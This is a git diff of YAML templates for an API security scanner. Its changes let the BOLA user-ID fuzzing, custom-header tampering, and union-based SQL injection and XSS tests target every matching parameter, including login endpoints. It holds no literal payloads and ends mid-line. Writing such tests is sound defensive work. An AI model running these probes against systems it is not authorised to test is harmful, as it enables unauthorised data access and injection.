diff --git a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml index 3fc4af7e1..80b72e019 100644 --- a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDDELETE.yml @@ -79,12 +79,12 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -96,9 +96,11 @@ execute: requests: - req: - modify_body_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true - modify_query_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml index 68f9bd6f5..8f3a14961 100644 --- a/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAByFuzzingUserIDPATCH.yml @@ -81,12 +81,12 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey - query_param: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -98,9 +98,11 @@ execute: requests: - req: - modify_body_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true - modify_query_param: - userKey: ${random_ids} + ${userKey}: ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml b/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml index 09c260a18..00c4d6156 100644 --- a/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAByReplacingParamWithJSONObjectPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -92,7 +92,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml index 3053b435e..b85bd0b54 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArray.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: @@ -95,8 +95,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml index 662836047..621cef8e4 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: @@ -91,8 +91,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml index 992e1f491..78a6663ff 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElements.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -97,9 +97,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml index 0b72b30db..f695ad4d6 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal @@ -95,9 +95,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml index 89d8756f2..e3dabd5b1 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithInteger.yml @@ -91,7 +91,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -106,9 +106,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml index 24fdf05dd..7f138a123 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayMultiElementsWithIntegerPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -95,9 +95,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml index eafb762a1..3d869a2d7 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamArrayPATCH.yml @@ -80,7 +80,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: @@ -93,8 +93,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - "${random_ids}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml index 171f5c940..100380eda 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArray.yml @@ -91,7 +91,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: - 1 @@ -104,8 +104,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml index 448c52205..77ce516c1 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamIntegerArrayDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: - 1 @@ -91,8 +91,9 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml b/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml index de9d0e2d4..faaf8309c 100644 --- a/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAJSONBodyParamMultiElementsWithIntegerDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -93,9 +93,10 @@ execute: requests: - req: modify_body_param: - userKey: + ${userKey}: - ${random_ids} - ${userVal} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml index 9be21bda0..bd07b3100 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeader.yml @@ -84,7 +84,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -96,7 +96,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml index 79046957f..ec2d8ae0b 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderDELETE.yml @@ -85,7 +85,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml index a40fab0fd..cbd6ffe8f 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderPATCH.yml @@ -87,7 +87,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: source: sample_data @@ -99,7 +99,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml index 8a2c6c685..14bee6173 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithInteger.yml @@ -84,7 +84,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: - 1 @@ -97,7 +97,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml index 1acff226b..0551e27e0 100644 --- a/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAModifyCustomHeaderWithIntegerDELETE.yml @@ -85,7 +85,7 @@ api_selection_filters: - Account - Subscriber - User-Hash - extract: headerValue + extractMultiple: headerValue wordLists: specialHeaders: - 1 @@ -98,7 +98,8 @@ execute: requests: - req: - modify_header: - headerValue: "${specialHeaders}" + ${headerValue}: "${specialHeaders}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml b/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml index 2f4163733..fda25c058 100644 --- a/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml +++ b/Broken-Object-Level-Authorization/BOLAQueryParamArray.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data diff --git a/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml b/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml index fb2392897..96b3ca2f3 100644 --- a/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml +++ b/Broken-Object-Level-Authorization/BOLAURLReplaceUserIDQueryParam.yml @@ -81,7 +81,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|^username$|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey value: not_contains: ${attempt_Ids} @@ -97,8 +97,9 @@ execute: requests: - req: - modify_query_param: - userKey: ${attempt_Ids} + ${userKey}: ${attempt_Ids} + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml index fbf99f9f9..b068240e5 100644 --- a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml +++ b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObject.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -90,7 +90,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml index 9d10dfdb3..90cb71757 100644 --- a/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml +++ b/Broken-Object-Level-Authorization/BOLAbyReplacingParamWithJSONObjectDELETE.yml @@ -78,7 +78,7 @@ api_selection_filters: for_one: key: regex: "^UserId$|^UserID$|^User-ID$|^user_id$|^user-id$|^userid$|username|^Username$|^USERNAME$|^uId$|^uid$|^UID$|^member_id$|^MemberId$|^memberId$|^profile_id$|^ProfileId$|^profileId$|^userIdentifier$|^UserIdentifier$|^user_identifier$|^account_id$|^AccountID$|^account-id$|^account_id$|^customer_id$|^CustomerID$|^customer-id$|^customer_id$" - extract: userKey + extractMultiple: userKey wordLists: random_ids: source: sample_data @@ -90,7 +90,8 @@ execute: requests: - req: modify_body_param: - userKey: "{\"${userKey}\":\"${random_ids}\"}" + ${userKey}: "{\"${userKey}\":\"${random_ids}\"}" + for_each_combination: true validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml index 864d61c5d..c514330c8 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiGET.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -100,7 +100,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -152,7 +153,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml index 3ed6903eb..fd6943411 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiLoginEndpoint.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -109,7 +109,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -161,7 +162,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -213,7 +215,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml index 8c7a20ccd..8318ef132 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiPOST.yml @@ -73,7 +73,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -100,7 +100,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${unionBasedPayloads} + ${userKey}: ${userVal}${unionBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -152,7 +153,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -204,7 +206,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${unionNegativeBasedPayloads} + ${userKey}: ${userVal}${unionNegativeBasedPayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml index 6bc2256b6..67c22818e 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSS.yml @@ -82,7 +82,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -105,7 +105,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -156,7 +157,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -207,7 +209,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml index c2753f51d..8cf12e298 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSGET.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: exit - req: - modify_query_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml index b8fa4414b..3f59fbb0b 100644 --- a/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml +++ b/Broken-User-Authentication/AdvancedUnionBasedSQLiXSSPOST.yml @@ -74,7 +74,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal wordLists: @@ -97,7 +97,8 @@ execute: requests: - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSPayloads} + ${userKey}: ${userVal}${advUnionXSSPayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -149,7 +150,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${userVal}${advUnionXSSNegativePayloads} + ${userKey}: ${userVal}${advUnionXSSNegativePayloads} + for_each_combination: true - validate: response_code: gte: 200 @@ -200,7 +202,8 @@ execute: - failure: 